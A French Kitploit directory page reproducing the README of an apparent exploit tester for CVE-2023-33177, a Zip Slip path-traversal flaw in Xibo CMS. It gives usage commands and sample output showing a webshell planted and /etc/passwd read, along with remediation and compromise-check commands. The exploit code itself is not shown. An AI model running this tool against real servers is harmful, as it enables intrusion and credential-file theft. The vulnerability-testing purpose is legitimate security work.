Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
-CVE-2023-33177- — Testeur de vulnérabilité Xibo CMS CVE-2023-33177 | Kitploit
Outils/GitHubGitHub/kaxm23/-cve-2023-33177-
ReconnaissanceScanners de VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubkaxm23/-cve-2023-33177-

-CVE-2023-33177-

Testeur de vulnérabilité Xibo CMS CVE-2023-33177

Voir le dépôt
il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Testeur de vulnérabilité Xibo CMS CVE-2023-33177

Python 3.6+ License

Outil de test de sécurité automatisé pour CVE-2023-33177 - Vulnérabilité Zip Slip Path Traversal dans Xibo CMS conduisant à une exécution de code à distance (RCE).

⚠️ Avertissement

Cet outil est destiné uniquement à des fins éducatives et de tests autorisés. Utilisez-le uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de test. Les tests non autorisés sont illégaux et contraires à l'éthique.

📋 Description

Les versions 1.8.0 à 2.3.16 et 3.0.0 à 3.3.4 de Xibo CMS sont vulnérables à une attaque de traversée de chemin via la fonctionnalité d'importation de mise en page. Cet outil teste en toute sécurité si votre instance Xibo est vulnérable en tentant d'écrire un fichier de test inoffensif.

Détails de la vulnérabilité

  • ID CVE : CVE-2023-33177
  • Type : Zip Slip Path Traversal → Exécution de code à distance
  • Impact : Les attaquants authentifiés peuvent écrire des fichiers arbitraires sur le serveur web
  • Correctif : Mettez à niveau vers Xibo CMS 3.3.5+ ou 2.3.17+

🚀 Fonctionnalités

  • ✅ Tests non destructifs (lecture de /etc/passwd uniquement pour vérification)
  • ✅ Gestion automatique de l'authentification
  • ✅ Génération de charge utile sécurisée
  • ✅ Rapports de vulnérabilité clairs
  • ✅ Nettoyage automatique des fichiers de test
  • ✅ Fonctionne avec HTTP/HTTPS

📦 Installation

root@kitploit:~
## Clone the repository
git clone [email protected]/kaxm23/-CVE-2023-33177-.git
cd xibo-cve-2023-33177-tester

## Install requirements
pip install -r requirements.txt## -CVE-2023-33177-

Structure de commande de base

root@kitploit:~
python test_cve_2023_33177.py <URL> <username> <password>

Exemples pratiques

root@kitploit:~
## Local development instance
python test_cve_2023_33177.py http://localhost/xibo admin password123

## Remote production with HTTPS
python test_cve_2023_33177.py https://xibo.example.com [email protected] SecurePass2024!

## Custom port and path
python test_cve_2023_33177.py http://192.168.1.100:8080/xibo admin mypassword

## Without trailing slash (script handles it)
python test_cve_2023_33177.py https://example.com/xibo admin pass

Exemple de sortie - VULNÉRABLE

root@kitploit:~
[*] Testing Xibo CMS at http://localhost/xibo
[*] CVE-2023-33177 - Zip Slip RCE Test

[+] Created test payload: test_vuln_1703123456.zip
[+] Successfully logged in as admin
[*] Attempting to import malicious layout...
[*] Import response: HTTP 200
[*] Checking for webshell...
[!] VULNERABLE! Webshell accessible at: http://localhost/security_test.php
[+] Successfully read /etc/passwd
[*] Output preview: VULN_TEST_root:x:0:0:root:/root:/bin/bash...

[!] Website IS VULNERABLE to CVE-2023-33177!
[!] Remediation: Update Xibo CMS to version 3.3.5+ or 2.3.17+
[!] Delete the test file: security_test.php

Exemple de sortie - NON VULNÉRABLE

root@kitploit:~
[*] Testing Xibo CMS at http://localhost/xibo
[*] CVE-2023-33177 - Zip Slip RCE Test

[+] Created test payload: test_vuln_1703123456.zip
[+] Successfully logged in as admin
[*] Attempting to import malicious layout...
[*] Import response: HTTP 200
[*] Checking for webshell...
[-] Webshell not found (HTTP 404)

[+] Website appears NOT vulnerable (or path differs)

🛡️ Guide de correction

root@kitploit:~
## Download latest version
wget https://github.com/xibosignage/xibo-cms/releases/latest

## Follow upgrade instructions
## https://xibo.org.uk/manual/en/upgrade.html

2. Vérification de compromission

root@kitploit:~
## Find recently modified PHP files in web root
find /var/www/html -name "*.php" -mtime -7 -type f

## Check for suspicious files
find /var/www/html -name "shell.php" -o -name "cmd.php" -o -name "backdoor.php"

## Review access logs for unauthorized imports
grep "layout/import" /var/log/apache2/access.log

3. Rotation des identifiants

root@kitploit:~
Change all CMS user passwords

Rotate API keys and tokens

Review and remove unauthorized user accounts

`
📋 Prérequis
Python 3.6 or higher

requests library (install via pip)

Valid Xibo CMS credentials (authentication required)

Network access to target Xibo instance

🤝 Contribution

root@kitploit:~

Fork the repository

Create a feature branch: git checkout -b feature/amazing-feature

Commit changes: git commit -m 'Add amazing feature'

Push to branch: git push origin feature/amazing-feature

Open a Pull Request

Contribution Requirements
Code must follow PEP 8 standards

Testing must remain non-destructive

Documentation must be updated

No live testing against unauthorized targets

📄 Licence

root@kitploit:~
This project is licensed under the MIT License - see the LICENSE file for details.

⚖️ Utilisation légale et éthique
By using this tool, you agree to:

Only test systems you own or have explicit written permission to test

Comply with all local, state, and federal laws

Not use this tool for malicious purposes

Report vulnerabilities responsibly to vendors

Accept full responsibility for your actions

🔗 Références

root@kitploit:~
CVE-2023-33177 NVD Entry

Xibo Security Advisories

Zip Slip Vulnerability Details

OWASP Path Traversal Guide

📞 Support et contact

root@kitploit:~
Issues: GitHub Issues

Security Reports: Please disclose responsibly via GitHub private vulnerability reporting

Questions: Open a discussion on GitHub

⭐ Historique des étoiles

root@kitploit:~
Si cet outil vous a aidé, pensez à mettre une étoile sur le dépôt !
Télécharger l’outil